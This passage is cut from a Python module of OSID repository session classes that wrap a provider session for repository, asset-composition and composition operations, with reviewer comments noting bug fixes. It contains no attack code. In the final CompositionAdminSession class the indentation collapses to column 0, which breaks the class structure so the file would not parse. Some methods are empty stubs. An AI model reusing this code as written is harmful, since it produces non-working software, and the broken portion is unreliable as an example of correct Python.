        raise: NullArgument - ``repository_form`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        raise: Unsupported - ``repository_form`` did not originate from
            ``get_repository_form_for_create()``
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.create_repository(repository_form)

    def can_update_repositories(self):
        """Tests if this user can update ``Repositories``.

        return: (boolean) - ``false`` if ``Repository`` modification is
            not authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.can_update_repositories()

    def get_repository_form_for_update(self, repository_id=None):
        """Gets the repository form for updating an existing repository.

        A new repository form should be requested for each update
        transaction.
        arg: repository_id (osid.id.Id): the ``Id`` of the
            ``Repository``
        return: (osid.repository.RepositoryForm) - the repository form
        raise: NotFound - ``repository_id`` is not found
        raise: NullArgument - ``repository_id`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.get_repository_form_for_update(repository_id)

    def update_repository(self, repository_form=None):
        """Updates an existing repository.

        arg: repository_form (osid.repository.RepositoryForm): the
            form containing the elements to be updated
        raise: IllegalState - ``repository_form`` already used in an
            update transaction
        raise: InvalidArgument - the form contains an invalid value
        raise: NullArgument - ``repository_form`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        raise: Unsupported - ``repository_form`` did not originate from
            ``get_repository_form_for_update()``
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.update_repository(repository_form)

    def can_delete_repositories(self):
        """Tests if this user can delete ``Repositories``.

        return: (boolean) - ``false`` if ``Repository`` deletion is not
            authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.can_delete_repositories()

    def delete_repository(self, repository_id=None):
        """Deletes a ``Repository``.

        arg: repository_id (osid.id.Id): the ``Id`` of the
            ``Repository`` to remove
        raise: NotFound - ``repository_id`` not found
        raise: NullArgument - ``repository_id`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('delete'):
            raise PermissionDenied()
        return self._provider_session.delete_repository(repository_id)

    def can_manage_repository_aliases(self):
        """Tests if this user can manage ``Id`` aliases for repositories.

        return: (boolean) - ``false`` if ``Repository`` aliasing is not
            authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): unimplemented stub -- returns None instead of
        # the documented boolean.
        pass

    def alias_repository(self, repository_id=None, alias_id=None):
        """Adds an ``Id`` to a ``Repository`` for the purpose of creating compatibility.

        The primary ``Id`` of the ``Repository`` is determined by the
        provider. The new ``Id`` is an alias to the primary ``Id``. If
        the alias is a pointer to another repository, it is reassigned
        to the given repository ``Id``.
        arg: repository_id (osid.id.Id): the ``Id`` of a
            ``Repository``
        arg: alias_id (osid.id.Id): the alias ``Id``
        raise: AlreadyExists - ``alias_id`` is in use as a primary
            ``Id``
        raise: NotFound - ``repository_id`` not found
        raise: NullArgument - ``repository_id`` or ``alias_id`` is
            ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('alias'):
            raise PermissionDenied()
        # BUGFIX: the original delegated with only repository_id,
        # silently dropping alias_id; both are required for aliasing.
        return self._provider_session.alias_repository(repository_id, alias_id)
class AssetCompositionSession(abc_repository_sessions.AssetCompositionSession, osid_sessions.OsidSession):
    """This session defines methods for looking up ``Asset`` to ``Composition`` mappings.

    A ``Composition`` represents a collection of ``Assets``.

    This lookup session defines several views:

    * comparative view: elements may be silently omitted or re-ordered
    * plenary view: provides a complete result set or is an error
      condition
    * isolated repository view: All lookup methods in this session
      operate, retrieve and pertain to assets and compositions defined
      explicitly in the current repository. Using an isolated view is
      useful for managing compositions with the
      CompositionAdminSession.
    * federated repository view: All lookup methods in this session
      operate, retrieve and pertain to all compositions and assets
      defined in this repository and any other compositions implicitly
      available in this repository through repository inheritence.

    The methods ``use_federated_asset_composition_view()`` and
    ``use_isolated_asset_composition_view()`` behave as a radio group
    and one should be selected before invoking any lookup methods.

    """

    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.

        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
        return self._provider_session.get_repository_id()

    repository_id = property(fget=get_repository_id)

    def get_repository(self):
        """Gets the ``Repository`` associated with this session.

        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin
        return self._provider_session.get_repository()

    repository = property(fget=get_repository)

    def can_access_asset_compositions(self):
        """Tests if this user can perform composition lookups.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known all methods in this
        session will result in a ``PermissionDenied``. This is intended
        as a hint to an application that may opt not to offer lookup
        operations to unauthorized users.

        return: (boolean) - ``false`` if lookup methods are not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise Unimplemented()

    def use_comparative_asset_composition_view(self):
        """The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.

        This view is used when greater interoperability is desired at
        the expense of precision.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_comparative_resource_view
        self._provider_session.use_comparative_asset_composition_view()

    def use_plenary_asset_composition_view(self):
        """A complete view of the returns is desired.

        Methods will return what is requested or result in an error.
        This view is used when greater precision is desired at the
        expense of interoperability.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_plenary_resource_view
        self._provider_session.use_plenary_asset_composition_view()

    def use_federated_repository_view(self):
        """Federates the view for methods in this session.

        A federated view will include compositions in repositories which
        are children of this repository in the repository hierarchy.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_federated_bin_view
        self._provider_session.use_federated_repository_view()

    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.

        An isolated view restricts lookups to this repository only.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_isolated_bin_view
        self._provider_session.use_isolated_repository_view()

    @utilities.arguments_not_none
    def get_composition_assets(self, composition_id):
        """Gets the list of assets mapped to the given ``Composition``.

        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        return: (osid.repository.AssetList) - list of assets
        raise:  NotFound - ``composition_id`` not found
        raise:  NullArgument - ``composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method is must be implemented.*

        """
        # BUG FIX: the provider result (an AssetList) was previously
        # discarded -- the method silently returned None.
        return self._provider_session.get_composition_assets(composition_id)

    @utilities.arguments_not_none
    def get_compositions_by_asset(self, asset_id):
        """Gets a list of compositions including the given asset.

        arg:    asset_id (osid.id.Id): ``Id`` of the ``Asset``
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NotFound - ``asset_id`` is not found
        raise:  NullArgument - ``asset_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: the provider result (a CompositionList) was previously
        # discarded -- the method silently returned None.
        return self._provider_session.get_compositions_by_asset(asset_id)
class AssetCompositionDesignSession(abc_repository_sessions.AssetCompositionDesignSession, osid_sessions.OsidSession):
    """This session provides the means for adding assets to an asset composition.

    The asset is identified inside a composition using its own Id. To
    add the same asset to the composition, multiple compositions should
    be used and placed at the same level in the ``Composition``
    hierarchy.

    """

    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.

        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
        return self._provider_session.get_repository_id()

    repository_id = property(fget=get_repository_id)

    def get_repository(self):
        """Gets the ``Repository`` associated with this session.

        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin
        return self._provider_session.get_repository()

    repository = property(fget=get_repository)

    def can_compose_assets(self):
        """Tests if this user can manage mapping of ``Assets`` to ``Compositions``.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known all methods in this
        session will result in a ``PermissionDenied``. This is intended
        as an application hint that may opt not to offer composition
        operations.

        return: (boolean) - ``false`` if asset composition is not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        return True

    @utilities.arguments_not_none
    def add_asset(self, asset_id, composition_id):
        """Appends an asset to a composition.

        arg:    asset_id (osid.id.Id): ``Id`` of the ``Asset``
        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        raise:  AlreadyExists - ``asset_id`` already part
                ``composition_id``
        raise:  NotFound - ``asset_id`` or ``composition_id`` not found
        raise:  NullArgument - ``asset_id`` or ``composition_id`` is
                ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: ``self`` was erroneously passed as the first positional
        # argument to the provider's bound method, shifting every real
        # argument by one (asset_id arrived where composition_id was
        # expected).  Same fix applied to the other mutators below.
        self._provider_session.add_asset(asset_id, composition_id)

    @utilities.arguments_not_none
    def move_asset_ahead(self, asset_id, composition_id, reference_id):
        """Reorders assets in a composition by moving the specified asset in front of a reference asset.

        arg:    asset_id (osid.id.Id): ``Id`` of the ``Asset``
        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        arg:    reference_id (osid.id.Id): ``Id`` of the reference
                ``Asset``
        raise:  NotFound - ``asset_id`` or ``reference_id`` ``not found
                in composition_id``
        raise:  NullArgument - ``asset_id, reference_id`` or
                ``composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: removed stray ``self`` argument (see add_asset above).
        self._provider_session.move_asset_ahead(asset_id, composition_id, reference_id)

    @utilities.arguments_not_none
    def move_asset_behind(self, asset_id, composition_id, reference_id):
        """Reorders assets in a composition by moving the specified asset behind of a reference asset.

        arg:    asset_id (osid.id.Id): ``Id`` of the ``Asset``
        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        arg:    reference_id (osid.id.Id): ``Id`` of the reference
                ``Asset``
        raise:  NotFound - ``asset_id`` or ``reference_id`` ``not found
                in composition_id``
        raise:  NullArgument - ``asset_id, reference_id`` or
                ``composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: removed stray ``self`` argument (see add_asset above).
        self._provider_session.move_asset_behind(asset_id, composition_id, reference_id)

    @utilities.arguments_not_none
    def order_assets(self, asset_ids, composition_id):
        """Reorders a set of assets in a composition.

        arg:    asset_ids (osid.id.Id[]): ``Ids`` for a set of
                ``Assets``
        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        raise:  NotFound - ``composition_id`` not found or, an
                ``asset_id`` not related to ``composition_id``
        raise:  NullArgument - ``asset_ids`` or ``composition_id`` is
                ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: removed stray ``self`` argument (see add_asset above).
        self._provider_session.order_assets(asset_ids, composition_id)

    @utilities.arguments_not_none
    def remove_asset(self, asset_id, composition_id):
        """Removes an ``Asset`` from a ``Composition``.

        arg:    asset_id (osid.id.Id): ``Id`` of the ``Asset``
        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        raise:  NotFound - ``asset_id`` ``not found in composition_id``
        raise:  NullArgument - ``asset_id`` or ``composition_id`` is
                ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # BUG FIX: removed stray ``self`` argument (see add_asset above).
        self._provider_session.remove_asset(asset_id, composition_id)
class CompositionLookupSession(abc_repository_sessions.CompositionLookupSession, osid_sessions.OsidSession):
    """This session provides methods for retrieving ``Composition`` objects.

    The ``Composition`` represents a collection of ``Assets``.

    This session defines views that offer differing behaviors when
    retrieving multiple objects.

    * comparative view: elements may be silently omitted or re-ordered
    * plenary view: provides a complete and ordered result set or is
      an error condition
    * isolated repository view: All lookup methods in this session
      operate, retrieve and pertain to compositions defined explicitly
      in the current repository. Using an isolated view is useful for
      managing compositions with the ``CompositionAdminSession.``
    * federated repository view: All composition methods in this
      session operate, retrieve and pertain to all compositions
      defined in this repository and any other compositions implicitly
      available in this repository through repository inheritence.
    * active composition view: All composition lookup methods return
      active compositions.
    * any status composition view: Compositions of any active or
      inactive status are returned from methods.
    * sequestered composition view: All composition methods suppress
      sequestered compositions.
    * unsequestered composition view: All composition methods return
      all compositions.

    Generally, the comparative view should be used for most applications
    as it permits operation even if there is data that cannot be
    accessed. For example, a browsing application may only need to
    examine the ``Composition`` it can access, without breaking
    execution. However, an administrative application may require a
    complete set of ``Composition`` objects to be returned.

    Compositions may have an additional records indicated by their
    respective record types. The record may not be accessed through a
    cast of the ``Composition``.

    """

    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.

        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
        return self._provider_session.get_repository_id()

    repository_id = property(fget=get_repository_id)

    def get_repository(self):
        """Gets the ``Repository`` associated with this session.

        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin
        return self._provider_session.get_repository()

    repository = property(fget=get_repository)

    def can_lookup_compositions(self):
        """Tests if this user can perform ``Composition`` lookups.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known all methods in this
        session will result in a ``PermissionDenied``. This is intended
        as a hint to an application that may opt not to offer lookup
        operations to unauthorized users.

        return: (boolean) - ``false`` if lookup methods are not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.can_lookup_resources
        # NOTE: It is expected that real authentication hints will be
        # handled in a service adapter above the pay grade of this impl.
        return True

    def use_comparative_composition_view(self):
        """The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.

        This view is used when greater interoperability is desired at
        the expense of precision.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_comparative_resource_view
        self._provider_session.use_comparative_composition_view()

    def use_plenary_composition_view(self):
        """A complete view of the ``Composition`` returns is desired.

        Methods will return what is requested or result in an error.
        This view is used when greater precision is desired at the
        expense of interoperability.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_plenary_resource_view
        self._provider_session.use_plenary_composition_view()

    def use_federated_repository_view(self):
        """Federates the view for methods in this session.

        A federated view will include compositions in repositories which
        are children of this repository in the repository hierarchy.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_federated_bin_view
        self._provider_session.use_federated_repository_view()

    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.

        An isolated view restricts lookups to this repository only.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.use_isolated_bin_view
        self._provider_session.use_isolated_repository_view()

    def use_active_composition_view(self):
        """Only active compositions are returned by methods in this session.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_active_composition_view()

    def use_any_status_composition_view(self):
        """All active and inactive compositions are returned by methods in this session.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_any_status_composition_view()

    def use_sequestered_composition_view(self):
        """The methods in this session omit sequestered compositions.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_sequestered_composition_view()

    def use_unsequestered_composition_view(self):
        """The methods in this session return all compositions, including sequestered compositions.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_unsequestered_composition_view()

    @utilities.arguments_not_none
    def get_composition(self, composition_id):
        """Gets the ``Composition`` specified by its ``Id``.

        arg:    composition_id (osid.id.Id): ``Id`` of the
                ``Composition``
        return: (osid.repository.Composition) - the composition
        raise:  NotFound - ``composition_id`` not found
        raise:  NullArgument - ``composition_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method is must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resource
        # NOTE: This implementation currently ignores plenary view
        return self._provider_session.get_composition(composition_id)

    @utilities.arguments_not_none
    def get_compositions_by_ids(self, composition_ids):
        """Gets a ``CompositionList`` corresponding to the given ``IdList``.

        arg:    composition_ids (osid.id.IdList): the list of ``Ids`` to
                retrieve
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NotFound - an ``Id`` was not found
        raise:  NullArgument - ``composition_ids`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resources_by_ids
        # NOTE: This implementation currently ignores plenary view
        return self._provider_session.get_compositions_by_ids(composition_ids)

    @utilities.arguments_not_none
    def get_compositions_by_genus_type(self, composition_genus_type):
        """Gets a ``CompositionList`` corresponding to the given composition genus ``Type`` which does not include compositions of types derived from the specified ``Type``.

        arg:    composition_genus_type (osid.type.Type): a composition
                genus type
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NullArgument - ``composition_genus_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resources_by_genus_type
        # NOTE: This implementation currently ignores plenary view
        return self._provider_session.get_compositions_by_genus_type(composition_genus_type)

    @utilities.arguments_not_none
    def get_compositions_by_parent_genus_type(self, composition_genus_type):
        """Gets a ``CompositionList`` corresponding to the given composition genus ``Type`` and include any additional compositions with genus types derived from the specified ``Type``.

        arg:    composition_genus_type (osid.type.Type): a composition
                genus type
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NullArgument - ``composition_genus_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
        return self._provider_session.get_compositions_by_parent_genus_type(composition_genus_type)

    @utilities.arguments_not_none
    def get_compositions_by_record_type(self, composition_record_type):
        """Gets a ``CompositionList`` containing the given composition record ``Type``.

        arg:    composition_record_type (osid.type.Type): a composition
                record type
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NullArgument - ``composition_record_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resources_by_record_type
        # STILL NEED TO IMPLEMENT!!!
        # NOTE(review): the "STILL NEED TO IMPLEMENT" marker above may be
        # stale -- the call below does delegate to the provider; confirm.
        return self._provider_session.get_compositions_by_record_type(composition_record_type)

    @utilities.arguments_not_none
    def get_compositions_by_provider(self, resource_id):
        """Gets a ``CompositionList`` from the given provider.

        In plenary mode, the returned list contains all known
        compositions or an error results. Otherwise, the returned list
        may contain only those compositions that are accessible through
        this session.

        In sequestered mode, no sequestered compositions are returned.
        In unsequestered mode, all compositions are returned.

        arg:    resource_id (osid.id.Id): a resource ``Id``
        return: (osid.repository.CompositionList) - the returned
                ``Composition list``
        raise:  NullArgument - ``resource_id`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.get_compositions_by_provider(resource_id)

    def get_compositions(self):
        """Gets all ``Compositions``.

        return: (osid.repository.CompositionList) - a list of
                ``Compositions``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceLookupSession.get_resources
        # NOTE: This implementation currently ignores plenary view
        return self._provider_session.get_compositions()

    compositions = property(fget=get_compositions)
class CompositionQuerySession(abc_repository_sessions.CompositionQuerySession, osid_sessions.OsidSession):
    """This session provides methods for searching among ``Composition`` objects.

    The search query is constructed using the ``CompositionQuery``.

    This session defines views that offer differing behaviors when
    searching.

    * federated repository view: searches include compositions in
      repositories of which this repository is an ancestor in the
      repository hierarchy
    * isolated repository view: searches are restricted to subjects in
      this repository
    * sequestered composition view: All composition methods suppress
      sequestered compositions.
    * unsequestered composition view: All composition methods return
      all compositions.

    Compositions may have a query record indicated by their respective
    record types. The query record is accessed via the
    ``CompositionQuery``.

    """

    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.

        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.get_repository_id()

    repository_id = property(fget=get_repository_id)

    def get_repository(self):
        """Gets the ``Repository`` associated with this session.

        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.get_repository()

    repository = property(fget=get_repository)

    def can_search_compositions(self):
        """Tests if this user can perform ``Composition`` searches.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known all methods in this
        session will result in a ``PermissionDenied``. This is intended
        as a hint to an application that may opt not to offer search
        operations to unauthorized users.

        return: (boolean) - ``false`` if search methods are not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.can_search_compositions()

    def use_federated_repository_view(self):
        """Federates the view for methods in this session.

        A federated view will include compositions in repositories which
        are children of this repository in the repository hierarchy.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_federated_repository_view()

    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.

        An isolated view restricts lookups to this repository only.

        *compliance: mandatory -- This method is must be implemented.*

        """
        # CONSISTENCY FIX: previously invoked the private
        # ``_use_isolated_catalog_view()`` on the provider session; every
        # sibling session in this file (e.g. CompositionLookupSession and
        # use_federated_repository_view above) delegates to the public
        # repository-view method instead.
        self._provider_session.use_isolated_repository_view()

    def use_sequestered_composition_view(self):
        """The methods in this session omit sequestered compositions.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_sequestered_composition_view()

    def use_unsequestered_composition_view(self):
        """The methods in this session return all compositions, including sequestered compositions.

        *compliance: mandatory -- This method is must be implemented.*

        """
        self._provider_session.use_unsequestered_composition_view()

    def get_composition_query(self):
        """Gets a composition query.

        return: (osid.repository.CompositionQuery) - the composition
                query
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.get_composition_query()

    composition_query = property(fget=get_composition_query)

    @utilities.arguments_not_none
    def get_compositions_by_query(self, composition_query):
        """Gets a list of ``Compositions`` matching the given composition query.

        arg:    composition_query (osid.repository.CompositionQuery):
                the composition query
        return: (osid.repository.CompositionList) - the returned
                ``CompositionList``
        raise:  NullArgument - ``composition_query`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        raise:  Unsupported - ``composition_query`` is not of this
                service
        *compliance: mandatory -- This method must be implemented.*

        """
        return self._provider_session.get_compositions_by_query(composition_query)
class CompositionAdminSession(abc_repository_sessions.CompositionAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Compositions``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Composition,`` a ``CompositionForm`` is requested using
``get_composition_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``CompositionForm`` will indicate that it is to be used with a
create operation and can be used to examine metdata or validate data
prior to creation. Once the ``CompositionForm`` is submiited to a
create operation, it cannot be reused with another create operation
unless the first operation was unsuccessful. Each
``CompositionForm`` corresponds to an attempted transaction.
For updates, ``CompositionForms`` are requested to the
``Composition`` ``Id`` that is to be updated using
``getCompositionFormForUpdate()``. Similarly, the
``CompositionForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``CompositionForm`` can only be used once for a successful update
and cannot be reused.
The delete operations delete ``Compositions``. To unmap a
``Composition`` from the current ``Repository,`` the
``CompositionRepositoryAssignmentSession`` should be used. These
delete operations attempt to remove the ``Bid`` itself thus removing
it from all known ``Repository`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
    def get_repository_id(self):
        """Gets the ``Repository`` ``Id`` associated with this session.

        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
        # Pure delegation to the wrapped provider session.
        return self._provider_session.get_repository_id()

    repository_id = property(fget=get_repository_id)
    def get_repository(self):
        """Gets the ``Repository`` associated with this session.

        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise:  OperationFailed - unable to complete request
        raise:  PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceLookupSession.get_bin
        # Pure delegation to the wrapped provider session.
        return self._provider_session.get_repository()

    repository = property(fget=get_repository)
    def can_create_compositions(self):
        """Tests if this user can create ``Compositions``.

        A return of true does not guarantee successful authorization. A
        return of false indicates that it is known creating a
        ``Composition`` will result in a ``PermissionDenied``. This is
        intended as a hint to an application that may not wish to offer
        create operations to unauthorized users.

        return: (boolean) - ``false`` if ``Composition`` creation is not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceAdminSession.can_create_resources
        # NOTE: It is expected that real authentication hints will be
        # handled in a service adapter above the pay grade of this impl.
        return True
    @utilities.arguments_not_none
    def can_create_composition_with_record_types(self, composition_record_types):
        """Tests if this user can create a single ``Composition`` using the desired record types.

        While ``RepositoryManager.getCompositionRecordTypes()`` can be
        used to examine which records are supported, this method tests
        which record(s) are required for creating a specific
        ``Composition``. Providing an empty array tests if a
        ``Composition`` can be created with no records.

        arg:    composition_record_types (osid.type.Type[]): array of
                composition record types
        return: (boolean) - ``true`` if ``Composition`` creation using
                the specified ``Types`` is supported, ``false``
                otherwise
        raise:  NullArgument - ``composition_record_types`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for
        # osid.resource.ResourceAdminSession.can_create_resource_with_record_types
        # NOTE: It is expected that real authentication hints will be
        # handled in a service adapter above the pay grade of this impl.
        return True
@utilities.arguments_not_none
def get_composition_form_for_create(self, composition_record_types):
"""Gets the composition form for creating new compositions.
A new form should be requested for each create transaction.
arg: composition_record_types (osid.type.Type[]): array of
composition record types
return: (osid.repository.CompositionForm) - the composition form
raise: NullArgument - ``composition_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.get_resource_form_for_create_template
return self._provider_session.get_composition_form_for_create(composition_record_types)
@utilities.arguments_not_none
def create_composition(self, composiiton_form):
"""Creates a new ``Composition``.
arg: composiiton_form (osid.repository.CompositionForm): the
form for this ``Composition``
return: (osid.repository.Composition) - the new ``Composition``
raise: IllegalState - ``composition_form`` already used in a
create transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``composition_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``composition_form`` did not originate
from ``get_composition_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.create_resource_template
return self._provider_session.create_composition(composiiton_form)
def can_update_compositions(self):
"""Tests if this user can update ``Compositions``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a
``Composition`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may not wish to offer
update operations to unauthorized users.
return: (boolean) - ``false`` if ``Composition`` modification is
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceAdminSession.can_create_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def get_composition_form_for_update(self, composition_id):
"""Gets the composition form for updating an existing composition.
A new composition form should be requested for each update
transaction.
arg: composition_id (osid.id.Id): the ``Id`` of the
``Composition``
return: (osid.repository.CompositionForm) - the composition form
